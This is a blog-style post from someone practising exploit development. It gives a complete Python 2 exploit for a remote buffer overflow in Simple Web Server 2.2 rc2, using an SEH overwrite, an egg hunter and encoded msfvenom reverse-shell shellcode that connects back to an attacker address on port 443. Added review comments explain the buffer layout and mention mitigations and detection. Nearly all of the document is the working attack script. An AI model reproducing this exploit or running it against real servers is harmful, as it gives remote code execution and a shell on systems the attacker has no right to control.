I was looking for a vulnerable application on which to practice SEH bypass and egg hunting techniques. I found this exploit on Exploit-DB; it targets a remote buffer overflow vulnerability in Simple Web Server 2.2 rc2.
The author of that exploit tested it on a Windows XP machine, and it is a simple EIP overwrite exploit. I decided to modify it to spawn a reverse shell using SEH bypass and egg hunting, since there was not much space left for the shellcode.
Here is the final exploit code:
#!/usr/bin/env python
# NOTE(review): this is a Python 2 script (print statements, str used as a raw
# byte buffer); it will not run unmodified under Python 3.
import sys,socket
# Exploit Title: [Simple Web Server 2.2 rc2 - Remote Buffer Overflow (SEH Bypass + Egg Hunter) ]
# Date: [02/01/2018]
# Vulnerability Credit: [mr.pr0n (@_pr0n_)]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Home Page: [https://slidingwindow0xff.wordpress.com/]
# Vendor Homepage: []
# Version: [Simple Web Server 2.2 rc2]
# Tested on: [Windows 7]
# CVE : []
'''
root@kali:~# ./exploit.py 192.168.253.136
[+]Sending junk + egg hunter + shellcode to the target...
[+]Junk sent to the target...
[+]Got shell!!???
'''
# Exactly one positional argument is expected: the target host name or address.
if len(sys.argv) <2:
    print "\n[+]Usage:\n ./SimpleWebServer.py \n"
    sys.exit()
target = sys.argv[1]

# --- Overflow layout ---------------------------------------------------------
# The author's earlier iterations are kept as commented-out lines: the total
# overflow is 2300 bytes and the SEH record is reached at offset 2284.
#junk = "A" * 2300 #pattern_offset.rb shows offset at 2284
#This overwrites SEH record with Bs
#junk = "A" * 2284 + "B" * 4 + "C" * (2300 - 4 )
# SEH handler overwrite: a hard-coded address of a POP/POP/RET sequence.
# A fixed address can only work when the module it lives in loads at a
# predictable base and is not SafeSEH-protected; ASLR and SafeSEH on that
# module are the platform mitigations that would defeat this step.
seh = "\x7e\x44\xc5\x6f" #0x6FC5447E POP ESI, POP EDI, RETN
#junk = "A" * 2284 + seh + "C" * (2300 - 4 )
# Next-SEH field: a 2-byte short jump followed by two NOPs. EB D0 is
# "jmp rel8 -0x30": 48 bytes back from the end of the jump, i.e. 46 bytes
# back from the start of nseh, which is where the hunter window begins.
nseh = "\xeb\xd0\x90\x90" #EB D0 - Short JMP 46 bytes backwards in memory. This gives us 46 bytes to put our egg hunter routine.
#junk = "A" * (2284 - 46 - len(nseh))+ "B" * 46 + nseh + seh + "C" * (2300 - 4 )
# Marker placed directly in front of the shellcode. Despite the inline
# comment, the egg is the 4-byte tag "w00t" written twice, so len(egg) == 8;
# the junk arithmetic below depends on that 8-byte length.
egg = "w00tw00t" #A 4-byte tag to look for in memory
#32-byte egg hunter
# Search stub that scans memory for the tag and transfers control to what
# follows it. It occupies 32 of the 46-byte window before nseh; the remaining
# 14 bytes are NOP padding (see `junk` below).
hunter =(
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02"
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"w00t"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.132 LPORT=443 -f c -b "\x00\x0a\x0d\x1a" EXITFUNC=thread
#payload size 351 bytes
# NOTE(review): opaque, encoded msfvenom output copied from a public listing.
# What these bytes actually do cannot be verified by reading them; the
# LHOST/LPORT above is only what the author's comment states. Any such blob
# should be treated as untrusted code (24 string fragments, 351 bytes total).
shellcode = (
"\xdd\xc7\xbb\xf8\xa7\xf4\x99\xd9\x74\x24\xf4\x5d\x31\xc9\xb1"
"\x52\x83\xc5\x04\x31\x5d\x13\x03\xa5\xb4\x16\x6c\xa9\x53\x54"
"\x8f\x51\xa4\x39\x19\xb4\x95\x79\x7d\xbd\x86\x49\xf5\x93\x2a"
"\x21\x5b\x07\xb8\x47\x74\x28\x09\xed\xa2\x07\x8a\x5e\x96\x06"
"\x08\x9d\xcb\xe8\x31\x6e\x1e\xe9\x76\x93\xd3\xbb\x2f\xdf\x46"
"\x2b\x5b\x95\x5a\xc0\x17\x3b\xdb\x35\xef\x3a\xca\xe8\x7b\x65"
"\xcc\x0b\xaf\x1d\x45\x13\xac\x18\x1f\xa8\x06\xd6\x9e\x78\x57"
"\x17\x0c\x45\x57\xea\x4c\x82\x50\x15\x3b\xfa\xa2\xa8\x3c\x39"
"\xd8\x76\xc8\xd9\x7a\xfc\x6a\x05\x7a\xd1\xed\xce\x70\x9e\x7a"
"\x88\x94\x21\xae\xa3\xa1\xaa\x51\x63\x20\xe8\x75\xa7\x68\xaa"
"\x14\xfe\xd4\x1d\x28\xe0\xb6\xc2\x8c\x6b\x5a\x16\xbd\x36\x33"
"\xdb\x8c\xc8\xc3\x73\x86\xbb\xf1\xdc\x3c\x53\xba\x95\x9a\xa4"
"\xbd\x8f\x5b\x3a\x40\x30\x9c\x13\x87\x64\xcc\x0b\x2e\x05\x87"
"\xcb\xcf\xd0\x08\x9b\x7f\x8b\xe8\x4b\xc0\x7b\x81\x81\xcf\xa4"
"\xb1\xaa\x05\xcd\x58\x51\xce\x32\x34\xa4\x8a\xdb\x47\x56\x92"
"\xa0\xc1\xb0\xfe\xc6\x87\x6b\x97\x7f\x82\xe7\x06\x7f\x18\x82"
"\x09\x0b\xaf\x73\xc7\xfc\xda\x67\xb0\x0c\x91\xd5\x17\x12\x0f"
"\x71\xfb\x81\xd4\x81\x72\xba\x42\xd6\xd3\x0c\x9b\xb2\xc9\x37"
"\x35\xa0\x13\xa1\x7e\x60\xc8\x12\x80\x69\x9d\x2f\xa6\x79\x5b"
"\xaf\xe2\x2d\x33\xe6\xbc\x9b\xf5\x50\x0f\x75\xac\x0f\xd9\x11"
"\x29\x7c\xda\x67\x36\xa9\xac\x87\x87\x04\xe9\xb8\x28\xc1\xfd"
"\xc1\x54\x71\x01\x18\xdd\x91\xe0\x88\x28\x3a\xbd\x59\x91\x27"
"\x3e\xb4\xd6\x51\xbd\x3c\xa7\xa5\xdd\x35\xa2\xe2\x59\xa6\xde"
"\x7b\x0c\xc8\x4d\x7b\x05")
print "[+]Sending junk + egg hunter + shellcode to the target..."
# Final buffer, left to right, 2300 bytes in total:
#   "A" filler (1875) | egg (8) | shellcode (351) | NOP pad (14) | hunter (32)
#   | nseh (4) | seh (4) | "C" trailer (12)
# The filler shrinks by the size of egg + shellcode + hunter window so that
# nseh still lands at offset 2284 and seh at 2288.
junk = "A" * (2284 - len(egg) - len(shellcode) - 46 - len(nseh)) + egg + shellcode + "\x90" * (46 - len(hunter)) + hunter + nseh + seh + "C" * (2300 - 2284 - 4 )
# The overflow is carried as the value of a Connection: header inside an
# otherwise ordinary GET. Only the final line is CRLF-terminated; the other
# header lines end in a bare LF.
# Detection/mitigation: a ~2.3 KB header value consisting of long runs of a
# single byte plus a NOP sled is trivially signature-able, and a request-header
# size limit enforced in front of the server would reject the request before
# it reaches the vulnerable header parser.
buf = "GET / HTTP/1.1\n"
buf += "HOST: " + target + "\n"
buf += "User-Agent: Mozilla/5.0 \n"
buf += "Connection: " + junk + "\r\n\r\n"
# Plain TCP to port 80: no timeout is set, the return value of send() is not
# checked, there is no error handling (a refused connection surfaces as an
# uncaught socket.error traceback), and the socket is never closed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 80))
sock.send(buf)
# Both messages are printed unconditionally; nothing here observes whether the
# target actually responded or crashed.
print "[+]Junk sent to the target..."
print "[+]Got shell!!???"